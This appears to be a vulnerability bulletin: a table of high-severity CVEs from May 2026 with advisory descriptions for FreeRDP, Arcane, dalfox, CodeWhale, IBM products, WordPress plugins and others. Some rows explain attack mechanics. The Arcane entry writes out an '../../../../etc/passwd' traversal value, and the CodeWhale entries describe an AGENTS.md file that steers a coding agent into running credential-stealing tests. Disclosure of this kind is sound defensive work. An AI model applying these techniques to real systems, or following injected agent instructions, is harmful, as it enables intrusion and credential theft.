| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, a malicious RDP client can trigger a heap-buffer-overflow write in FreeRDP's server-side clipboard (cliprdr) channel by sending a CB_CLIP_CAPS PDU with a too-small capabilitySetLength. This can crash the server process (remote DoS) and may be exploitable for code execution because it corrupts heap memory. This vulnerability is fixed in 3.26.0. | 2026-05-29 | 8.8 | CVE-2026-44420 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, a malicious RDP server can trigger a heap-buffer-overflow write in the FreeRDP client by sending crafted RDPGFX PDUs. The bug is in gdi_CacheToSurface: it validates a destination rectangle that is clamped to UINT16_MAX, but then performs the copy using the original cacheEntry->width/height. This can cause a large out-of-bounds heap write and may lead to client crashes or code execution. This bug is reachable from a malicious RDP server, but only when the client has RDPGFX enabled. This vulnerability is fixed in 3.26.0. | 2026-05-29 | 8.8 | CVE-2026-44421 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, FreeRDP's RDPEAR NDR parser accepts one non-null NDR pointer ref-id for multiple logical pointer fields without tracking the pointed object's expected NDR type or ownership. When the same ref-id is reused across two pointer fields, the parser assigns the same heap object to both output fields. The generic destructor later walks each field independently and destroys/frees both pointers. This causes a malicious-server-triggerable heap use-after-free / double-free in the FreeRDP client's RDPEAR authentication-redirection path. This vulnerability is fixed in 3.26.0. | 2026-05-29 | 7.5 | CVE-2026-44422 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.220, the email processing pipeline in FreeScout's FetchEmails command has two code paths for identifying agent (user) replies based on In-Reply-To / References headers. The notification reply path (notify-{thread_id}-{user_id}-...) extracts thread_id and user_id directly from the Message-ID without HMAC verification. An external attacker who can spoof the From address of a helpdesk agent can inject messages that FreeScout processes as legitimate agent replies - which are then automatically forwarded to customers via the legitimate SMTP server. This vulnerability is fixed in 1.8.220. | 2026-05-29 | 7.5 | CVE-2026-47123 |
| Fyffe--PHP-Twitter-Clone | Twitter-Clone 1 contains a SQL injection vulnerability in follow.php that allows attackers to manipulate database queries by injecting SQL code through the userid parameter. Attackers can submit union-based or time-based blind SQL injection payloads to extract sensitive database information including usernames, passwords, and database credentials. | 2026-05-25 | 8.2 | CVE-2018-25362 |
| Fyffe--PHP-Twitter-Clone | Twitter-Clone 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the name parameter. Attackers can submit crafted payloads to the search.php endpoint to extract database information including usernames, credentials, and system data using error-based and union-based SQL injection techniques. | 2026-05-25 | 8.2 | CVE-2018-25364 |
| Gallagher--Command Centre Server | Insertion of Sensitive Information into Log File (CWE-532) in some Command Centre Service installers could lead to Service Account credentials exposure.  Mitigating Factor: Only sites that install Command Centre Services with a custom Service Account (not the default Network Service account) are potentially impacted. Mitigation: For sites concerned about exposure, the recommended action is to change the Service Account password. They can also delete any installer log files, usually found in %programdata%\Gallagher\Command Centre. | 2026-05-25 | 8.1 | CVE-2026-25193 |
| GDAL--GDAL | In GDAL 3.1.0 through 3.13.0, scanForGeometryContainers in the netCDF driver allows code execution via a stack-based buffer overflow. It reads a geometry attribute into a fixed-size stack buffer without validating the attribute length. The attacker embeds the exploit as an oversized geometry attribute in a crafted NetCDF file. This achieves arbitrary code execution on the server running GDAL. This is in frmts/netcdf/netcdfsg.cpp. | 2026-05-27 | 7.4 | CVE-2026-49014 |
| Genetec Inc.--Genetec RabbitMQ | A high-severity vulnerability in the deployment of Genetec RabbitMQ that allows a privilege escalation attack. | 2026-05-26 | 7.8 | CVE-2026-25112 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.0, Arcane's huma-based REST API exposes nine endpoints under /api/customize/git-repositories and /api/git-repositories/sync for managing GitOps source repositories and their stored credentials. Eight of those endpoints (list, create, get, update, delete, test, listBranches, browseFiles) never call the checkAdmin(ctx) helper that every other admin-managed resource (container registries, environments, users, API keys, swarm, settings, system, notifications, events) uses, and the huma authentication middleware deliberately enforces only authentication, not the admin role. As a result, any logged-in user with the default user role can list, create, modify, delete, and test git repository configurations. By repointing an existing repository's URL to an attacker-controlled host while omitting the token/sshKey fields (which UpdateRepository only rewrites when explicitly supplied), the attacker causes Arcane to decrypt the legitimate PAT/SSH key on its next /test, /branches, or /files call and present it as HTTP Basic auth (or SSH key auth) to the attacker's host - producing a one-step exfiltration of plaintext Git credentials. This vulnerability is fixed in 1.19.0. | 2026-05-29 | 9.9 | CVE-2026-45625 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.0, the unauthenticated GET /api/app-images/logo endpoint reflects a user-supplied color query parameter into the body of an SVG document via strings.ReplaceAll with no escaping. The substitution lands inside a <style> element of the embedded logo.svg, allowing an attacker to close the style block and inject executable <script> content. Because the response is served as image/svg+xml and Arcane sets no Content-Security-Policy or X-Content-Type-Options headers, navigating a logged-in admin victim to a crafted URL executes attacker-controlled JavaScript in Arcane's origin and rides the victim's HttpOnly JWT cookie to fully compromise the admin account. This vulnerability is fixed in 1.19.0. | 2026-05-29 | 8.2 | CVE-2026-45627 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.2, the PUT /api/environments/{id}/templates/variables endpoint, which writes the system-wide .env.global file used for variable substitution in every project's compose file, is missing an admin authorization check. Any authenticated non-admin user can call this endpoint with their bearer token or API key and overwrite the global environment variables that are merged into every project deployment. By overriding values like REGISTRY, IMAGE, DATABASE_URL, or SECRET_KEY that other users reference via ${VAR} in compose files, an attacker can redirect image pulls to attacker-controlled registries (supply-chain RCE on the Docker host), exfiltrate database credentials, or disrupt all projects. This vulnerability is fixed in 1.19.2. | 2026-05-29 | 8.8 | CVE-2026-47125 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.4, ProjectService.GetProjectFileContent returns the contents of any Docker Compose include directive declared in a project's compose file before any path-traversal validation runs. Because ProjectService.CreateProject writes attacker-supplied compose content to disk without validating include paths, an authenticated user can create a project whose compose file declares include: ['../../../../etc/passwd'], then read the include via the project file API. The result is arbitrary read of any file readable by the Arcane backend process, including /app/data/arcane.db (the SQLite database containing every user's password hash and API key), enabling escalation to admin and, via Arcane's Docker control plane, RCE on the host. This vulnerability is fixed in 1.19.4. | 2026-05-29 | 7.7 | CVE-2026-47179 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.8 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that, under certain conditions, could have allowed an authenticated user to cause specific Duo AI workflows to run under another user's identity due to improper user identity resolution when triggering Duo AI workflow runners. | 2026-05-27 | 8.2 | CVE-2026-4868 |
| gitoxide--gitoxide | gix-submodule before 0.29.0 (gitoxide before 0.5.21, gix before 0.84.0) incorrectly validates the update field in .gitmodules, allowing attackers to bypass the CommandForbiddenInModulesConfiguration guard when a submodule has been initialized with only partial configuration in .git/config. An attacker can inject arbitrary shell commands via the update field in .gitmodules that will be executed when Submodule::update() is called on a previously-initialized submodule, enabling remote code execution. | 2026-05-26 | 7.8 | CVE-2026-40034 |
| Gladinet--Triofox | A stack-based buffer overflow condition exists in WOSDefaultHttpModule.dll when processing a long URL path starting with /woshome | 2026-05-27 | 9.8 | CVE-2026-8362 |
| Gladinet--Triofox | A stack-based buffer overflow condition exists in WOSDeviceDropFolder.dll when processing a long URL path starting with /resources: | 2026-05-27 | 9.8 | CVE-2026-8363 |
| Gladinet--Triofox | Gladinet Triofox Cloud Server Agent Access Service (GladServerAgentService.exe) listens on TCP port 7878 and processes remote HTTP messages with URL paths starting with /resources, /status, /sysinfo, /woshome, /Settings, /schedule, or /DavCache. | 2026-05-27 | 9.8 | CVE-2026-8364 |
| Gladinet--Triofox | When processing a request with a URL path starting with /status or /sysinfo, WOSHttpStatusModule.dll is to be loaded to handle such URL patterns. The WOSBin_LoadHttpModule function in the dll would be called to set up a "module" object for that module. However, WOSHttpStatusModule.dll is not present in the installation. As a result, a function pointer to WOSBin_LoadHttpModule (which would have been in the export table in WOSHttpStatusModule.dll) is set to NULL, resulting in calling a function at address 0. | 2026-05-27 | 7.5 | CVE-2026-8359 |
| Gladinet--Triofox | Function calls to WOSCommonUtil.dll!WOSSysInfoGetDeviceInterface() in various DLLs (i.e., WOSProfileMgrModule.dll, WOSWebDavModule.dll) can return a NULL pointer (i.e., when no user is logged into the Triofox Server Agent Management Console). The returned NULL pointer is not checked before being dereferenced. | 2026-05-27 | 7.5 | CVE-2026-8360 |
| Gladinet--Triofox | A path traversal vulnerability exists in WOSDefaultHttpModule.dll when processing a URL path starting with /woshome | 2026-05-27 | 7.5 | CVE-2026-8361 |
| glboy--OTP Login With Phone Number, OTP Verification | The OTP Login With Phone Number, OTP Verification plugin for WordPress is vulnerable to authentication bypass in versions 1.8.50 through 1.8.60. This is due to the Firebase verification flow in the `lwp_ajax_register` AJAX handler not binding the Firebase session to the phone number supplied in the request. The `idehweb_lwp_activate_through_firebase()` function validates that a Firebase OTP session is legitimate, but the `phoneNumber` returned by Firebase is never compared against the victim's stored phone number. This makes it possible for unauthenticated attackers to authenticate as any user who has a phone number stored in user meta, including administrators, by verifying their own Firebase session and supplying the victim's phone number in the same request. | 2026-05-29 | 9.8 | CVE-2026-3655 |
| globalscape--CuteFTP | CuteFTP 5.0 XP contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by injecting malicious payload into the Site Manager label field. Attackers can craft a payload exceeding 520 bytes that overwrites the return address and executes shellcode when a shortcut is created and launched. | 2026-05-25 | 8.4 | CVE-2018-25366 |
| GNU--libredwg | A flaw has been found in GNU libredwg up to 0.13.4.8160. This issue affects the function bit_read_RC of the file bits.c of the component Dwgbmp Utility. This manipulation causes heap-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: 8f03865f37f5d4ffd616fef802acc980be54d300. Applying a patch is the recommended action to fix this issue. | 2026-05-26 | 7.3 | CVE-2026-9605 |
| go-git--go-billy | Billy is an interface filesystem abstraction for Go. Prior to 5.9.0, multiple path traversal issues exist across different components of go-billy. Insufficient path sanitization and boundary enforcement may allow crafted paths (e.g., using ..) to escape intended base directories. While go-billy was not originally designed to provide a strong security boundary, some of these issues were inconsistent across some of the built-in implementations. This results in scenarios where applications relying on go-billy for some level of isolation may inadvertently expose access to unintended filesystem locations. This vulnerability is fixed in 5.9.0. | 2026-05-28 | 8.1 | CVE-2026-44973 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 10 | CVE-2026-45087 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is run in REST API server mode, the output, output-all, and debug fields in model.Options are JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine's logging path. The logger opens the attacker-supplied path with os.O_APPEND|os.O_CREATE|os.O_WRONLY and writes scan log lines to it. Critically, this file write block lives outside the IsLibrary guard in DalLog, so it executes even in server/library mode where file output was never intended to operate. Because no API key is required in the default configuration, an unauthenticated network caller can create or append to any file writable by the dalfox process on the host filesystem. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 8.2 | CVE-2026-45089 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is run in REST API server mode, the custom-payload-file field in model.Options is JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine. The engine passes the value to voltFile.ReadLinesOrLiteral, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 7.5 | CVE-2026-45088 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage - which processes POST-body parameters (dp) - is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != "" (i.e., the attacker supplies the data field) and the target reflects at least one parameter. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 7.5 | CVE-2026-45090 |
| hanxi--xiaomusic | xiaomusic v0.5.7 contains an unauthenticated path traversal vulnerability in the GET /music/{file_path:path} endpoint that allows unauthenticated attackers to read arbitrary files outside the intended music directory by exploiting an incomplete path prefix check. Attackers can request files from sibling directories whose names share the music_path prefix by crafting traversal sequences, bypassing the path restriction due to the missing trailing separator in the comparison logic to retrieve arbitrary files from the server. | 2026-05-29 | 7.5 | CVE-2026-10108 |
| hassantafreshi--Easy Form Builder | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in hassantafreshi Easy Form Builder easy-form-builder allows Blind SQL Injection.This issue affects Easy Form Builder: from n/a through <= 4.0.6. | 2026-05-27 | 9.3 | CVE-2026-42747 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Versions up to and including 26.0.0 are affected by a stored cross-site scripting (XSS) vulnerability in the `/system/api/saveNode` endpoint. An authenticated user with a permission to edit pages can bypass the HTML sanitizer by injecting an event handler attribute without whitespace before the attribute name. @haxtheweb/haxcms-nodejs 26.0.1 and haxcms-php 26.0.2 patch the issue. | 2026-05-29 | 8.7 | CVE-2026-48527 |
| Heatmiser--Heatmiser Wifi Thermostat | Heatmiser Wifi Thermostat 1.7 contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve administrative credentials by accessing the networkSetup.htm page. Attackers can request the networkSetup.htm endpoint and extract plaintext username and password values from HTML form fields to gain administrative access to the thermostat. | 2026-05-29 | 7.5 | CVE-2018-25396 |
| hemant6488--CodeIgniter-StudentManagementSystem | A vulnerability was determined in hemant6488 CodeIgniter-StudentManagementSystem. The affected element is an unknown function of the file /index.php/students/addStudentView of the component Student Management Handler. Executing a manipulation can lead to improper access controls. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 7.3 | CVE-2026-9517 |
| himmelblau-idm--himmelblau | Himmelblau is an interoperability suite for Microsoft Azure Entra ID and Intune. From 2.0.0 to before 3.1.5 and 2.3.11, Himmelblau contained an authentication bypass vulnerability in the Device Authorization Grant (DAG) flow that allowed a user within the same Entra ID domain to obtain a local Unix session as another user by providing their own valid credentials. The vulnerability existed in the token_validate function, which validated domain aliases for legitimate multi-domain scenarios but failed to verify that the local part (username) of the authenticated user's UPN matched the requested account username. The function only compared domains, not the complete usernames. This vulnerability is fixed in 3.1.5 and 2.3.11. | 2026-05-27 | 8.4 | CVE-2026-45108 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.7 and 11.0.0.0, including 9.3.x and 8.3.x, does not prevent certain XML parsers from resolving external entities. | 2026-05-27 | 7.7 | CVE-2026-2253 |
| HKUDS--DeepCode | DeepCode through commit c991dc2 contains a path traversal vulnerability in the SPA catch-all route in new_ui/backend/main.py that allows unauthenticated attackers to read arbitrary files by supplying percent-encoded path segments to the GET /{full_path:path} endpoint. Attackers can bypass Starlette's path normalization by encoding slashes as %2F and dots as %2E%2E, causing the joined path to traverse outside FRONTEND_DIST and exposing sensitive files such as SSH private keys, TLS certificates, and application secrets with a single HTTP request. | 2026-05-28 | 7.5 | CVE-2026-32847 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. From 0.3.0 to 0.8.23, the run_tests tool executes cargo test in the workspace with ApprovalRequirement::Auto, meaning it runs without any user approval prompt. cargo test compiles and executes arbitrary code: test binaries, build.rs build scripts, and proc macros. While auto-approving test execution is a deliberate design choice, it creates an inconsistency in the security boundary. However, in a malicious repository, test code can execute arbitrary shell commands, exfiltrate credentials, or establish persistence with zero approval. The attack is amplified by AGENTS.md (auto-loaded into the system prompt), which can instruct the model to run tests proactively at session start. This vulnerability is fixed in 0.8.23. | 2026-05-28 | 9.6 | CVE-2026-45311 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. Prior to 0.8.26, the task_create tool spawns durable sub-agents that inherit two insecure defaults, allow_shell defaults to true (config.rs:1499: self.allow_shell.unwrap_or(true)) and auto_approve defaults to true (task_manager.rs:297: auto_approve: Some(true)). When a user approves a task_create call (which requires ApprovalRequirement::Required), they approve what appears to be a benign work prompt. However, the spawned sub-agent silently receives unrestricted, unapproved shell access. This vulnerability is fixed in 0.8.26. | 2026-05-28 | 9.6 | CVE-2026-45374 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. Prior to 0.8.22, the fetch_url tool validates the initial URL's resolved IP address against a restricted-IP blocklist (is_restricted_ip()) to prevent SSRF attacks against internal services (cloud metadata endpoints, localhost, private networks). However, the HTTP client (reqwest) is configured to automatically follow up to 5 redirects (reqwest::redirect::Policy::limited(5)) without re-validating the redirect target against the same SSRF protections. This vulnerability is fixed in 0.8.22. | 2026-05-28 | 7.4 | CVE-2026-45310 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. Prior to 0.8.26, although SSRF is validated against hostnames that resolve to private IPv6 addresses, when providing the IPV6 in‌‌ URL‌ as http://[::1], the SSRF defenses do not work. This vulnerability is fixed in 0.8.26. | 2026-05-28 | 7.4 | CVE-2026-45373 |
| home-assistant--core | Home Assistant is open source home automation software that puts local control and privacy first. Prior to 2026.4.1 for iOS and 2026.4.4 for Android, he Home Assistant Companion apps for Android and iOS expose a JavaScript bridge to the in-app WebView window.externalApp on Android and webkit.messageHandlers.getExternalAuth (alongside revokeExternalAuth and externalBus) on iOS. Two flaws expose the bridge to all frames (including cross-origin iframes) and unsanitized interpolation of the JavaScript callback identifier allows a cross-origin iframe rendered inside the Companion app to execute arbitrary JavaScript in the Home Assistant frontend's main-frame origin and exfiltrate the signed-in user's access token. This vulnerability is fixed in 2026.4.1 for iOS and 2026.4.4 for Android. | 2026-05-29 | 8.3 | CVE-2026-44698 |
| HT Plugins--HT Contact Form 7 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HT Plugins HT Contact Form 7 ht-contactform allows Stored XSS.This issue affects HT Contact Form 7: from n/a through <= 2.8.2. | 2026-05-27 | 7.1 | CVE-2026-42728 |
| htplugins--HT Contact Form Drag & Drop Form Builder for WordPress | The HT Contact Form - Drag & Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'file_upload' parameter in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the 'Store Submissions' setting to be enabled, as this controls whether unsanitized field values are persisted to the database and subsequently rendered via dangerouslySetInnerHTML in the admin entry viewer. | 2026-05-28 | 7.2 | CVE-2026-7052 |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to Privilege Escalation via Validation Bypass in all versions up to and including 0.9.2.5. The vulnerability exists due to the after_validate_save_post() function unconditionally trusting the attacker-controlled _acf_post_id POST parameter - with no authentication or integrity verification - to select a cleanup branch that silently discards all validation errors not prefixed with acfe:. This makes it possible for unauthenticated attackers to suppress both the role allow-list validation error added by acfe_field_user_roles::validate_front_value() and the administrator-role capability guard error added by acfe_module_form_action_user::validate_action(), causing wp_insert_user() to execute with an attacker-supplied administrator role argument and resulting in the creation of a new administrator-level user account. Exploitation requires the target site to expose a public ACFE frontend form configured with a Create User action that maps a role field. | 2026-05-28 | 9.8 | CVE-2026-8809 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a buffer overflow in the asperahttpd component. This vulnerability could be exploited to cause a denial of service and potentially lead to authentication bypass or remote code execution. | 2026-05-27 | 9.8 | CVE-2026-8175 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a buffer overflow in the asperahttpd component. This vulnerability could allow an authenticated user to execute arbitrary code on the system. | 2026-05-27 | 8.8 | CVE-2026-8179 |
| IBM--Aspera High-Speed Transfer Endpoint | IBM Aspera High-Speed Transfer Endpoint 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Server 3.7.4 through 4.4.7 Fix Pack 1 and IBM Aspera High-Speed Transfer Endpoint are affected by a potential denial of service in the asperahttpd component. An unauthenticated user can cause the asperahttpd service to crash. | 2026-05-27 | 7.5 | CVE-2026-8180 |
| IBM--Controller | IBM Controller 11.0.1, 11.1.0, 11.1.1, and 11.1.2 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. | 2026-05-27 | 8.8 | CVE-2026-5065 |
| IBM--Db2 | IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to a denial of service with a specially crafted query when autonomous transactions are enabled. | 2026-05-27 | 7.1 | CVE-2026-1718 |
| IBM--Engineering Lifecycle Management | IBM Engineering Lifecycle Management 7.0.3, 7.1.0, and 7.2.0 could allow an unauthenticated remote attacker to update server property files that would allow them to gain unauthorized access to the application. | 2026-05-26 | 9.8 | CVE-2026-3660 |
| IBM--Engineering Lifecycle Management | IBM Engineering Lifecycle Management 7.0.3 Interim Fix 001 through Interim Fix 021, 7.1.0 Interim Fix 001 through Interim Fix 009, and 7.2.0 and 7.2.0 Interim Fix 001 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. An authenticated attacker could exploit this vulnerability to expose sensitive information or consume memory resources. | 2026-05-26 | 7.1 | CVE-2026-3603 |
| IBM--Engineering Lifecycle Management | IBM Engineering Lifecycle Management 7.0.3, 7.1.0, and 7.2.0 could allow an attacker with administrative privileges to execute remote code due to exposed method that is not properly restricted. | 2026-05-26 | 7.2 | CVE-2026-4051 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 contains a buffer overflow vulnerability. A privileged user, authenticated to the Administration Server, could exploit this vulnerability to execute remote code or cause a denial of service. | 2026-05-26 | 8 | CVE-2026-8834 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 is vulnerable to remote code execution and denial of service in configurations with TLS mutual authentication (client authentication). | 2026-05-26 | 8.1 | CVE-2026-8855 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 is vulnerable to invalid pointer dereference. A privileged user, authenticated to the Administration Server, could exploit this vulnerability to expose sensitive information or cause a denial of service. | 2026-05-26 | 7.3 | CVE-2026-8835 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 is vulnerable to denial of service via the optional module mod_ibm_upload. | 2026-05-26 | 7.5 | CVE-2026-8850 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 is vulnerable to denial of service via the optional module mod_mem_cache. | 2026-05-26 | 7.5 | CVE-2026-8854 |
| IBM--HTTP Server | IBM HTTP Server 8.5, and 9.0 is vulnerable to denial of service in configurations where an attacker has write access to parts of the server configuration. | 2026-05-26 | 7.7 | CVE-2026-8856 |
| IBM--InfoSphere Optim Test Data Fabrication | IBM InfoSphere Optim Test Data Fabrication 1.0.0, 1.0.0.1, 1.0.0.2, 1.0.2, 1.0.2.2, 1.0.2.3, 1.0.2.4, 1.0.2.5, 1.0.2.6, 1.0.2.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system | 2026-05-27 | 7.5 | CVE-2026-3366 |
| IBM--Langflow OSS | IBM Langflow OSS 1.0.0 through 1.9.1 could allow remote code execution due to improper validation of symbolic links during archive extraction. | 2026-05-27 | 9.8 | CVE-2026-7524 |
| IBM--Langflow OSS | IBM Langflow OSS 1.0.0 through 1.9.0 could allow a denial of service due to uncontrolled resource consumption. | 2026-05-27 | 7.1 | CVE-2026-7528 |
| IBM--Netezza Performance Server Replication Services | IBM Netezza Performance Server Replication Services 3.0.2.0 through 3.0.5.0 allows an attacker with low‑privileged access to escalate their privileges to root. By exploiting this flaw, the attacker can execute root‑level commands, obtain a root shell, and change the root user's password. Successful exploitation also enables modification or removal of system‑wide files and the installation of persistent backdoors. This results in full system compromise with complete loss of confidentiality, integrity, and availability. | 2026-05-27 | 7.8 | CVE-2026-3623 |
| IBM--Operations Analytics - Log Analysis | IBM Operations Analytics - Log Analysis and IBM SmartCloud Analytics - Log Analysis uses default passwords default passwords from the manufacturing process for use during the installation process, which could allow an attacker to bypass authentication. | 2026-05-27 | 8.4 | CVE-2026-7365 |
| IBM--QRadar | IBM QRadar 7.5.0 through 7.5.0 UP15 Interim Fix 002 could allow a privileged user to upload a malicious backup archive that could be restored and used to gain access to the underlying operating system. | 2026-05-27 | 7.2 | CVE-2024-56462 |
| IBM--Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty | IBM Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty 8.5, 9.0 IBM WebSphere Application Server and WebSphere Application Server Liberty are vulnerable to remote code execution in the Web Server Plug-ins, through a specially crafted request. | 2026-05-26 | 9.8 | CVE-2026-8633 |
| IBM--Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty | IBM Web Server Plug-ins for WebSphere Application Server and WebSphere Liberty 8.5, 9.0 IBM WebSphere Application Server and WebSphere Application Server Liberty are vulnerable to HTTP request smuggling in the Web Server Plug-ins through a specially crafted request. | 2026-05-26 | 7.5 | CVE-2026-8620 |
| india-web-developer--Login with OTP | The Login with OTP plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.6. This is due to an incomplete fix for CVE-2024-11178: the rate-limit/lockout check added to `otpl_login_action()` was placed only inside the OTP-generation branch and is never evaluated on the OTP-validation branch, and the generated 6-digit OTP additionally has no expiration. This makes it possible for unauthenticated attackers to brute-force the 900,000-value OTP space for any user account (including administrators) and obtain a valid `wp_set_auth_cookie()` session, leading to full site compromise. | 2026-05-27 | 9.8 | CVE-2026-8760 |
| inducer--relate | RELATE is a web-based courseware package. Versions prior to commit 555f0efb1c5bd7531c07cd73724d7e566a81f620 have a stored cross-site scripting vulnerability that allows any enrolled student to execute arbitrary JavaScript in an administrator's browser session, potentially leading to full admin account takeover. The `get_user()` method in `ParticipationAdmin` renders user-controlled input using `mark_safe` combined with Python's % string formatting. This bypasses Django\'s automatic HTML escaping entirely. The value returned by `get_full_name` is derived directly from the `first_name` and `last_name` fields of the User model. These fields are freely editable by any authenticated user through the profile page (`/profile/`) with no sanitization applied. When an admin views the Participation list in the Django admin panel, the unsanitized value is rendered directly into the HTML response, causing the injected script to execute in the admin's browser. Commit 555f0efb1c5bd7531c07cd73724d7e566a81f620 fixes the issue. | 2026-05-27 | 8.7 | CVE-2026-42197 |
| infiniflow--ragflow | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In 0.24.0 and earlier, a Jinja2 template injection in the prompt generator (rag/prompts/generator.py) allows any authenticated user to execute arbitrary OS commands on the server. Any normal user can register, create a Canvas workflow with a DuckDuckGo + LLM component chain, and trigger the SSTI. | 2026-05-29 | 9.9 | CVE-2026-45312 |
| IniLerm--Advanced IP Blocker | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in IniLerm Advanced IP Blocker advanced-ip-blocker allows DOM-Based XSS.This issue affects Advanced IP Blocker: from n/a through <= 8.10.7. | 2026-05-27 | 7.1 | CVE-2026-42739 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-05-29 | 9.8 | CVE-2026-10071 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-05-29 | 7.2 | CVE-2026-10072 |
| Interinfo--DreamMaker | DreamMaker developed by Interinfo has an Arbitrary File Read vulnerability, allowing unauthenticated local attackers to exploit Relative Path Traversal to download arbitrary system files. | 2026-05-29 | 7.5 | CVE-2026-10073 |
